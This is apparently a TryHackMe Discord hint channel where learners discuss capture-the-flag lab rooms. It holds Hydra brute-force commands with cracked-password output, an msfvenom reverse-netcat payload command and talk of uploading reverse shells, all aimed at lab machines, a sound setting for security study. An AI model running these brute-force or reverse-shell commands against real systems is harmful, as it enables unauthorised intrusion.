past night
that's good, Dark does really good content so we are happy that you managed to learn something!
jovial sentinel
I really did. I am still on the "beginner path" (so I did not started so much time ago) and I already feel that this subscription is one of the best things I have ever spend my money on. so, good job guys π
amber cave
Hello, in the vulnersity room we ask directory that has an upload form page but when you paste the address deploy in the url we cannot have a page. How to do?
amber cave
Which port? I cannot see any port in the room
Except the exercise gobuster where the command specific the port 3333
I'm lost
median compass
did you do an nmap on the box as instructed @amber cave ?
and answered Task 2 question 7 yes?
amber cave
did you do an
nmapon the box as instructed @amber cave ?
@median compass yes i'm in the three task
and answered Task 2 question 7 yes?
@median compass yes it's ok
median compass
well that's the answer to james question, that's the port
so now you do gobuster and hopefully you can answer Task 3 question 2
stuck fractal
They found the directory
median compass
and then you use that answer to find the form http://IP:PORT/directory
stuck fractal
They're unable to access it in their browser probably because they missed the port
median compass
just trying to explain the why
amber cave
Ok thanks i understand now
shut lion
Hello guys, for the https://tryhackme.com/room/25daysofchristmas room, task 6
am in supposed to brute force my way in first to get the cookie or the cookie is supposed to appear once I land on the login page?
stuck fractal
You need to sign up
frail skiff
Hi guys! I am trying https://tryhackme.com/room/rpwebscanning task 3. I need to set a ZAP option to "specify what we are attacking". I don't know what to do in the ZAP gui. Any hints?
shut lion
Hi guys! I am trying https://tryhackme.com/room/rpwebscanning task 3. I need to set a ZAP option to "specify what we are attacking". I don't know what to do in the ZAP gui. Any hints?
@frail skiff there should be a Quick Scan tab on the main screen with a field called 'Target' where you specify the IP address
frail skiff
Thanks! I will try it now
devout seal
Team, I need some help on Flag 19 on Linux Challenges (Task #3, Last Question) I am trying to run the sed command with -l but I am not getting anything. I am also specifying the number. This is what it looks like: ||sed -l 2345 flag19||
Am I missing something?
Nevermind, I used something else other than sed
visual burrow
Anybody else manage to root basic pentesting via tomcat port 8080?
wintry yarrow
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done.
cold oracle
im stuck in blue
Rex::ConnectionTimeout: The connection timed out
this comes always
final mortar
What are your metasploit options
ashen matrix
In the room BruteIt and I am currently up to password #95,000 in the rockyou.txt file. Is my Hydra command wrong? If so please give me a hint on what may be wrong, not necessarily the correct command if possible.
||hydra -l admin -P /usr/share/wordlist/rockyou.txt http-post-form "/admin:user=^USER^&pass=^PASS^:F=Username"||
true prairie
As far as I know there is a general rule that brute force shouldn't take longer than 5 minutes. In your command @ashen matrix you should check the location you entered in the options section again
golden sedge
Can anyone give me a slight hint for the room "Year of the Owl"?
On the initial enumeration
white salmon
don't post the same question in multiple channels
cold oracle
Using the nmap flag -n what will it not resolve
frail rain
In the room BruteIt and I am currently up to password #95,000 in the rockyou.txt file. Is my Hydra command wrong? If so please give me a hint on what may be wrong, not necessarily the correct command if possible.
||hydra -l admin -P /usr/share/wordlist/rockyou.txt http-post-form "/admin:user=^USER^&pass=^PASS^:F=Username"||
@ashen matrix yeah, your command is incorrect , check and change your parameters according to the website
fiery moth
In the room BruteIt and I am currently up to password #95,000 in the rockyou.txt file. Is my Hydra command wrong? If so please give me a hint on what may be wrong, not necessarily the correct command if possible.
||hydra -l admin -P /usr/share/wordlist/rockyou.txt http-post-form "/admin:user=^USER^&pass=^PASS^:F=Username"||
@ashen matrix i think but not sure but f indicates the error msg you get once you login with invalid creds
cold oracle
im in the vulnversity room
Using the nmap flag -n what will it not resolve
this is my qs
fiery moth
google it
cold oracle
but can u tell something abt it?
fiery moth
cant you google it
or do nmap --help or smth or whatever command that shows you all the options
timid sequoia
i have been doing your room https://tryhackme.com/room/lle
i have stucked in task 7 question 2
i searched in gtfobins also but the answer is not in format which they have provided can anyone give a hit for that ?
ashen matrix
@frail rain @fiery moth I did set F to ||Username or password invalid|| and it faults instantly with saying 16 passwords are correct when they arent.... is that the right track tho?
frail rain
there is something wrong with it
ashen matrix
ok thank you. i will work on it then π
ashen matrix
ill give it a go thank you
fiery moth
imma compare it with the one i used to solve the room and i will lyk
frail rain
or maybe try like http-post-form "/dirname or filename/"
fiery moth
he did
/admin
ashen matrix
oh i see it now
thank you potato
I think.. will let you know
@fiery moth I think i missed something from it. trying something different to test
can pvt message you what i think i was missing
fiery moth
@ashen matrix can you send me the command you used with the login: fuction
jagged scaffold
Hey , I'm doing RELEVANT room and I've collected the password.txt in smb and kinda confused what to do next. .. I'm running gobuster on http and it's giving me timeout errors ....
Any help !? Tagg me when u ans
jagged scaffold
not tried
after finding the login credentials , i was hoping to find something on webserver
astral smelt
Try putting things in and see what you can do with it
trim dew
Does anyone know local file reading using [src]xss
Room:inacave
trim haven
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
trim dew
*Edited
trim haven
!rule 13
proud scarabBOT
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
astral smelt
Thatβa a new room
buoyant timber
fiery moth
Hey , I'm doing RELEVANT room and I've collected the password.txt in smb and kinda confused what to do next. .. I'm running gobuster on http and it's giving me timeout errors ....
Any help !? Tagg me when u ans
@jagged scaffold they are encoded in ||base64||
i can help you but i dont think i am allowed to
trim haven
Youβre sending them in the wrong direction.
fiery moth
if he already knew then he needs to run a gobuster scan
astral smelt
They did
fiery moth
once he does and finds the "hidden directory" it will point him out to the right direction
jagged scaffold
Hey @fiery moth , actually I already tried gobuster and it was giving me timeout errors
fiery moth
port 80 is open so you should be able to run gobuster
if gobuster doesnt work try dirsearch
also look for other ports too to run dir scans on
cosmic phoenix
Anyone able to give me a hint on the Learn Linux room's "Bonus Challenge - The True Ending"?
I'm logged in with ssh as shiba4 but can't find anything yet
frail rain
@jagged scaffold dirsearch is the way
median compass
for each user that you have try to look for files that they own in the system (find with a switch). One file will stand out as being in an odd place @cosmic phoenix
steady stratus
Thanks
lyric oasis
@median compass I've completed the room... interesting anonforce room..
median compass
good stuff, well done
steady stratus
Just an FYI @median compass thanks for the ping. Pulled into #talk-with-us-no-threading but they left the server shortly after. Ban has been issued (:
median compass
yeah, sorry for the direct ping but wasn't sure how best to ring the bell π usual kiddie stuff I assume, need haCKzz
steady stratus
Yeah absolutely (:
Any Mod/Staff that's available is the best way to get it dealt with π appreciate that
patent token
wooden estuary
I'm struck while solving year of the owl room, any hints for this I've analysed smb but no clues. If anyone solved this pls do give me some hints
white salmon
Room: GoldeEye Task 1 Question 5. I've retrived the password in the website source code, that is ||InvincibleHack3r|| but I don't understand what kind of encryptions is this. Google search and Hashcat wiki haven't been of help. It's possible to have a hint of where to look for understand the type of encryption used?
white salmon
Gotcha, thanks James!
plucky tusk
good grief WHY does mr. robots wp-login password change continually?
tf am I doing wrong here
hydra gives me pw, i input, no work. then re-run hydra, diff pw
solemn smelt
Sounds like however youβre running hydra has a wrong syntax that is causing false positives
plucky tusk
went with wpscan instead. ill have to revist hydra and see just what the heck that was about.
stuck fractal
WPScan is much easier
median reef
How much tries should Hydra take in Room Printer Hacking 101
stuck fractal
I don't think you should be brute forcing anything at all @median reef
winged mist
Try read the room description (I mean the texts in the room)
Or go for some writeups
stuck fractal
This channel is not for pushing people to writeups.
median reef
ah thanks @stuck fractal @winged mist
winged mist
Yayyy
haughty fractal
Evening, Having an issue with the Mr robot CTF room. I'm guessing I'm on the right track however I'm slightly stuck. Managed to get on to the wordpress login, however it will not let me install a plugin of which im sure is whats required so i can get a reverse shell. It only accepts .zip so i zipped my reverse shell and uploaded it. All i get in return is Plugin install failed.
final mortar
Evening, Having an issue with the Mr robot CTF room. I'm guessing I'm on the right track however I'm slightly stuck. Managed to get on to the wordpress login, however it will not let me install a plugin of which im sure is whats required so i can get a reverse shell. It only accepts .zip so i zipped my reverse shell and uploaded it. All i get in return is Plugin install failed.
@haughty fractal That's because you are supposed to upload a plugin, not a reverse shell
You might want to search for wordpress plugin reverse shell or something like that
There is also a metasploit module for that I believe that you can use
haughty fractal
thanks for the suggestion, I will look that up π
normal forum
for wonderland, is that .dbf file a rabbit hole?
stuck fractal
Completely and utterly
white salmon
Need some assistance here. New to try hack me and Iβm stuck in nmap room. I have been stuck on this question for a few minutes now. βHow do I set the timing to the max level, sometimes called insaneβ Iβve tried a lot of the timing commands in help. Any hints? Thank you!
plucky steppe
@white salmon did you check the man pages? It should tell you which flag is for insane
white salmon
Ok thank you @plucky steppe
white salmon
hey I'm a beginner. Any hint here?
stuck fractal
You need to run the binaru
white salmon
ok that worked
I kept running binary in /home directory so I couldn't get it
thanks
stuck fractal
Yeah
Do you know what you're doing with ./file?
. Refers to the current directory
./file is just a path to the file in the current working directory
You could run the shiba1 binary with /home/shiba1/shiba1
You're providing a path to the binary
But that first screenshot, you're trying to execute a directory rather than a binary. That doesn't work.
white salmon
ohhhh
now i got it
so it goes from home -> shiba2 -> ./shiba2
but I did it like home -> ./shiba2
stuck fractal
If your cwd is /home/shiba2 then ./shiba2 is equivalent to /home/shiba2/shiba2
stuck fractal
Please don't call me bro.
white salmon
oh my bad
stuck fractal
It's just uncomfortable seeing as you don't know me
storm relic
I hate that myself π
stuck fractal
@storm relic Hey, this channel is for asking for hints on TryHackMe rooms π
storm relic
sry was a mistake.
buoyant olive
Hi all, anyone with room mitre? >>> T7 Q6, I can't find enough information about
pallid siren
Can anyone give a hint for the "youre in a cave" room? Im confused asf lol
remote gate
@buoyant olive it'll be on the page for the sub-technique you found in T7 Q3
@pallid siren we're unable to give hints for new challenge rooms until 72 hours has past. (rule 13 in #rules ) sorry.
pallid siren
Didnt realize it was that new of a room
remote gate
no worries π
true zinc
Hello. I am stuck in the Biohazard room at the stage with crests. Could you give me a tip on how to crack the 2nd crest the second time and the 4th crest the first time pls? I tried base64/32/16 but none of them works. Was there a tip in one of the rooms on how to solve this?
empty nacelle
You're trying the right thing. I suggest using "cyberchef" for tasks like this. Makes it really easy to try different encoding combinations. Hint: if you search for "from base" on cyberchef, multiple options show up, not just the common ones.
pallid siren
Still trying to figure out "the cave"... has me feeling like an idiot π€£π€£i know everything is right in front of me, yet still eludes me
devout seal
Question about scp. After the scp command, are you inputting the machine you want to send the file to from the attack machine? i.e attacked@10.10.10.10$~ scp -r host@10.10.20.20 file.txt ~/Documents?
I am looking it up but it isn't being clear to me
Nevermind, I was trying to scp in the attack machine
true zinc
Thank you. I didn't know about this site.
buoyant olive
@buoyant olive it'll be on the page for the sub-technique you found in T7 Q3
@remote gate TY bro
white salmon
in hackpark room i provide that code : hydra -l admin -P /root/Desktop/Tools/wordlists/rockyou.txt 10.10.165.65 http-form-post "/Account/login.aspx?ReturnURL=admin:__VIEWSTATE=HVbKOC0ImvT7i5HZIKB9jOOzTKMe%2Fkvu%2BJarqDJcI3XVWvNsbD%2Bt35WfZ9bLjm7xjjvyC4PuIkVEiEEhd2l55FGZF71eJorrNFbKNUbUIKJ9xY5sgEUGVqvTxLz1lUs6t7Dd5fNFgLZcj5z1OEuPs%2FFVV%2F4IaUwQU5%2F7zq433vSZhYEp&__EVENTVALIDATION=3gOgkV6%2Fwhg7RxsUs8eJuXLPNWbSyQjoLzX%2Bn1Nb4SQ09Jq94FHl6sdwCPuFMEzmylrhI78YIFPDtk4euAQ23yus%2ByU3sob%2B5YAMq83kXpPEBTy33jMXE42iF%2FsFz58%2FuWafmg%2BgelWA7IPuG9jpTXW%2FBx0BaIFQ4%2FzX4AX%2BN59qxzdi&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
and receive this [80][http-post-form] host: 10.10.165.65 login: admin password: 12345 [80][http-post-form] host: 10.10.165.65 login: admin password: 123456 [STATUS] attack finished for 10.10.165.65 (waiting for children to complete tests) [80][http-post-form] host: 10.10.165.65 login: admin password: 123456789 [80][http-post-form] host: 10.10.165.65 login: admin password: password [80][http-post-form] host: 10.10.165.65 login: admin password: iloveyou [80][http-post-form] host: 10.10.165.65 login: admin password: princess [80][http-post-form] host: 10.10.165.65 login: admin password: 1234567 [80][http-post-form] host: 10.10.165.65 login: admin password: rockyou [80][http-post-form] host: 10.10.165.65 login: admin password: 12345678 [80][http-post-form] host: 10.10.165.65 login: admin password: daniel [80][http-post-form] host: 10.10.165.65 login: admin password: babygirl [80][http-post-form] host: 10.10.165.65 login: admin password: jessica [80][http-post-form] host: 10.10.165.65 login: admin password: monkey [80][http-post-form] host: 10.10.165.65 login: admin password: abc123 [80][http-post-form] host: 10.10.165.65 login: admin password: nicole [80][http-post-form] host: 10.10.165.65 login: admin password: lovely 1 of 1 target successfully completed, 16 valid passwords found Hydra (http://www.thc.org/thc-hydra) finished at 2020-11-20 12:21:13
the answer are no found is that a bug ?
try running hydra again
white salmon
i try and try for days
days 2 to be exact π
i have to cheat on this question
π©
i ran the command twice and got the right anwser
narrow barn
I heard from today we can make attempts on asking questions on yoto π I'm still trying to get in, but I think I have something what can be used to continue but not sure what I need to provide ))
stone oyster
In the Kenobi room using smb, I'm confused about the T2 Q3. It looks like it wants me to recursively d/l and gives the example smbget -R smb://ip/anonymouse
When I run that it says command not found.
Did I miss something?
white salmon
@Rick So the code u run is different ? or did i make a error ,
?
@stone oyster it means smbget is not installed
stone oyster
well...that's stupid.
lol
maybe I will go install.
maybe I won't.
we shall see
ty
unique siren
hi guys need a hint for lazy admin for root
for getting privesc when using perl system when specifying a file with a path
any idea how to achieve it?
unique siren
sorry just found the solution through a write up i messed up when reading the file permissions and trying to write to the file
wintry yarrow
No worries, happy hacking!
unique siren
thanks
wanton raft
Hello, need a nudge for ignite privesc
viscid osprey
I am new to thm, I am working on the linux challenges and I am having a tough time access flag 3? any tippers
wanton raft
@viscid osprey You can DM me
frail rain
Hi what is the name of the room?
white salmon
Linux challenges
task 3 linux functionality
frail rain
ohh
jovial sentinel
Room: Hashing - Crypto 101
Task 6
First question is about amd64 Kali 2019.4 ISO's SHA1 sum. I can't find anywhere the version from 2019, only 2020 is available. How I am going to get pass this question? π
PS: The link provided is not working either.
median compass
first question in which task?
jovial sentinel
Task 6
median compass
do you know the wayback machine?
this is obviously not how the room intended you to find it, but it's a cool tool to learn about if you haven't used it before
final mortar
Or you can look for old release indexes, that is what I did
Kali maintains an index of all kali,backtrack and other releases
median compass
recently though chika? cause that's what I did but the site doesn't seem to have them any more
final mortar
I just checked it
median compass
oh then I missed it
final mortar
I can DM you the index if you want
median compass
ahhh old.kali.org
final mortar
Yeah, but let him find it on his own π
median compass
the issue is that the link reads right, but the hyperlink is different, goes to cdimages.kali.org
final mortar
I just searched for Index of --- when I was searching for the first time
jovial sentinel
do you know the wayback machine?
I will try this. It's my first time hearing about this. π
median compass
i should've spotted the error
final mortar
Don't worry about it. You DID spot the error
median compass
I will try this. It's my first time hearing about this. π
if you keep reading you'll see you can get it the intended way too Iulian, but the wayback machine is definitely something you should check out too
jovial sentinel
Yep, I solved it already π
jovial sentinel
the issue is that the link *reads* right, but the hyperlink is different, goes t...
I missed this as well π
Thank you, guys
hasty gust
In need of help with CSP, Q3 if anyone is around/available
white salmon
I'm having a bit of issues with the LazyAdmin room
I can't get the php rce to work.
median compass
need more than that exoticsloth, what did you try, give us a screenshot maybe
median compass
so what did you do with that file?
median compass
i think, although I got a shell a different way, that you have to add that file in the admin panel as an Advert
so in other words you login with the username and password you found and you upload that html in the Ad section
then request it from your browser
you're getting a 404 because you're requesting a URL that doesn't exist I think
white salmon
but the login page comes only when the injection is successful right?
median compass
did you find login creds?
white salmon
yes
median compass
and did you search for a login page?
white salmon
nope
median compass
do that π ||gobuster||
white salmon
so gobuster the inc page? π
median compass
what directories did you find under ||/content||?
white salmon
I got the login. trying to upload a py file
median compass
good luck
white salmon
damn.
i got it but
I needed a bit of help after getting the rev shell
Thanks though @median compass
unique siren
hi guys need help in intro to x86-64 task 4 in if2 the value for var_8h the value im getting on px rbp-0x8 is wrong
severe flicker
Hello ppl, I need some help. What am I doing wrong?
What Room? Advent of Cyber
What Task? Task 7 [Day 2] Arctic Forum
What question? What is the path of the hidden page?
What have you tried?
- gobuster dir -u http://10.10.3.39:3000 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -s 200 -t 100
- wfuzz -u http://10.10.3.39:3000/FUZZ --hc=404 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100
What happened? It didn't find de hidden page, just the already known (login, register, logout)
The wordlist is recommended in the supporting material.
stuck fractal
Did you terminate the day 1 VM and deploy the day 2 VM?
white salmon
could use a hint for grep
Find flag 26 by searching the all files for a string that begins with 4bceb and is 32 characters long.
I was trying to do
find /* 2>/dev/null | grep -o -P '.{0,32}4bceb.{0,32}'
severe flicker
Did you terminate the day 1 VM and deploy the day 2 VM?
Oh no!! I Thought just one deploy would solve the room, like the others!!! Thank you!!!
stuck fractal
There's a couple rooms with multiple VMs
severe flicker
Good to know!!
past crypt
Hi! I'm stuck at AoC1 task 18 Im already Net authority system but I cant find root.txt file. Any hint?
empty nacelle
On windows machines the user/root.txts are usually in the Desktop folder
past crypt
Mmm maybe it's hidden
stuck fractal
Administrator desktop
white salmon
You need to look at file contents
thanks
How does this look?
grep -P "\b4bceb\w{27}\b" /*
stuck fractal
I don't know
warm walrus
hi all. is there an easy way to use both msf5 and msf6? I'm noticing that I'm having a lot of issues with msf6.
cedar axle
i still havent had any problems with msf6
frail rain
msf6 is unstable in some conditions
frail rain
well you can check reddit and github.. people have posted their issues there.
cedar axle
ok, fair enough
cedar axle
can anyone give me a nudge on 'in a cave', I've tried every verb i can find, not really sure what I'm missing, I'm sure ill kick myself when i find it
glass scarab
Hi. Need a bit of help:
What Room? Common Linux Privesc
What Task? Task 8 Exploiting Crontab
What question? Create a payload using: "msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R"
What have you tried?
I tried running the command, however the response I get is msfvenom: command not found. I am logged in as user4, as per instructions. What am I doing wrong?
eager flicker
Hi. Need a bit of help:
What Room? Common Linux Privesc
What Task? Task 8 Exploi...
You're supposed to run msfvenom on your own box not on the target.
glass scarab
when I do that, I get: Error one or more options failed to validate: LHOST.
eager flicker
when I do that, I get: Error one or more options failed to validate: LHOST.
replace LOCALIP with your attack box IP
glass scarab
thank you.
exotic echo
hi can anyone give me a hint on the learn linux walkthrough bonus challenge - the true ending
wintry yarrow
Look for files owned by other users.
exotic echo
is it outside the home/nootnoot directory?
wintry yarrow
It is iirc. Use find and check files owned by each user.
median compass
yes, search for files owned by every user you found, there's a switch in find for that, one file will be in an out-of-the-ordinary place
exotic echo
shiba4@nootnoot:/$ find */ -user noot 2>/dev/null
home/noot
home/noot/.profile
home/noot/.bashrc
home/noot/.bash_logout
shiba4@nootnoot:/$ find */ -user nootnoot 2>/dev/null
home/nootnoot
home/nootnoot/.sudo_as_admin_successful
home/nootnoot/.profile
home/nootnoot/.gnupg
home/nootnoot/.bashrc
home/nootnoot/.bash_history
home/nootnoot/.local
home/nootnoot/.local/share
home/nootnoot/.cache
home/nootnoot/.bash_logout
shiba4@nootnoot:/$
is all i can find
and i have no access on the .local/share
median compass
every user @exotic echo, you found a lot more than just those two
exotic echo
i tried every user in the /etc/passwd file but im clueless π¦
wintry yarrow
Its there. You may have seen it. π
exotic echo
do i only need to check /bin/bash users? or also all the nologin ones
stuck fractal
Don't worry about those other users
white salmon
Hi there, doing Dogcat room, got the root access on the machine, but i'm unable to find a flag4 on the machine, any hint on the location?
eager flicker
Hi there, doing `Dogcat` room, got the root access on the machine, but i'm unabl...
maybe it's not on the machine
white salmon
maybe it's not on the machine
Oh alright. thanks i'm gonna look for it somewhere else then
exotic echo
i ended up cheating the first part, i totally looked over it lol i was going way too deep in de files
3-4hours what could be 10 sec xD
primal mantle
Hey there!
I am a little bit stuck with the Question "Which registries are set to 1 while the nozzle is filling a bottle?" in the room "attacking ICS Plant #1"
I did the whole room, but I am Stuck with the Flag. Has anyone a hint?
white salmon
@primal mantle You found the answer for Which registries are set to 1 while the roller is moving the bottles but not the previous one ?
primal mantle
@white salmon You got me there π But i figured when i get the grasp on the first question i could figure out the 2nd.
my guess for the first is 24 thats what i saw and what worked for me in the questions later on...
manic jasper
room: https://tryhackme.com/room/rppsempire
task 8: question: What MITRE ATT&CK ...
you got it ? because am also struggling for it , and not getting anything
can anyone give hint regarding this , it will be appriciated
manic jasper
look inside of starkiller
tnx mate
warm walrus
in one of the channels <@!284157766333890561>
Thanks @frail rain You rock. I should have seen that.
indigo hill
There seems to be a problem with the https://tryhackme.com/room/crackthehash room , task 1 , question 4 hint says "A lot of tools will attempt to identify this as bcrypt and, well, that's not exactly right. Bcrypt is often cited (at this time) as being very difficult to crack. Try some other formats that start with the letter b, you'll see them in the suggested hash types" but no other hash types that start with b fits the hash , hashcat doesnt even start , at least the ones I have tried (that are listed in https://hashcat.net/wiki/doku.php?id=example_hashes).
I just checked a writeup and it says this is a bcrypt hash , why is the hint misleading ?
median compass
drop a note in #feedback-and-ideas maybe @indigo hill
indigo hill
drop a note in <#757261859270426745> maybe <@!334273665074200576>
yea i will do that , i am new didnt know, thanks
pallid siren
Stilp cant figure out what to do with "youre in a cave". Can i get a hint or 2?
stuck fractal
Please wait another day
woven mirage
it's been more than 3 days already
woven mirage
Stilp cant figure out what to do with "youre in a cave". Can i get a hint or 2?
where are you stuck?
stuck fractal
it's been more than 3 days already
Announcement was 20th, so if it was silent then oof. It's down to you anyway as you're the creator
pallid siren
@woven mirage sent you a pm. Didnt want to say too much in chat
woven mirage
well
play with the headers
one of them can show you the way
this first part uses a vulnerability not that common in tryhackme rooms, i think that i saw two or three that covers it, and i done most of the rooms in the platform
pallid siren
Will keep trying π
dusk imp
Who wants to help me with tomghost, getting the root flag.. I'm so close but I keep running into issues..
I don't want to spoil so if I could dm whoever will help, that would be lovely.
disregard.
viscid osprey
Just did the THM NMAP walk through and learned quite a bit, still missing a couple though. Super fun!!
pallid siren
Idk... im not getting it. Interesting room (cave), but over my head.
cedar axle
@pallid siren ||all i can think from Termacks hint is vhosts, but i don't know where to start *.thm?||
pseudo wraith
any hints for physical security intro? getting tired to solve this one.
stuck fractal
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
pseudo wraith
@stuck fractal I am stuck with padlock and lock anatomy stage in physical security intro room.
stuck fractal
Question numbers etc?
pseudo wraith
task4 question number 4
finding a lot of docs but can't find correct answer
trying this room for two days.
stuck fractal
@pseudo wraith https://en.wikipedia.org/wiki/Shim_(lock_pick)
Honestly it was much easier for me to find resources knowing the answer
woven mirage
<@!480751734042525706> ||all i can think from Termacks hint is vhosts, but i don...
Foothold has nothing to do with vhosts
cedar axle
thanks
@woven mirage || insecure deserialization?, totally lost||
meh, I'm gonna give up, not learning much by bashing my head against the wall
lyric oasis
box : buffer overflow prep
task : overflow 1
I've got the offset as 1976 why it's not accepting the answer
cedar axle
@lyric oasis where is EIP (instruction pointer)
lyric oasis
<@!648801865588539392> where is EIP (instruction pointer)
I've not used mona
instead I've used patten_offset
thorny drift
Hi all, quick question. im at the learn linux basics room. im trying to repeat the excercise. Ive created a file called noot.txt and run both that binary and did a cat shiba1 command but all it gives me is a random message with loads of special characters. Any advise in the right direction will be appreciated
trying to get the password for shiba2
dont worry
figured it out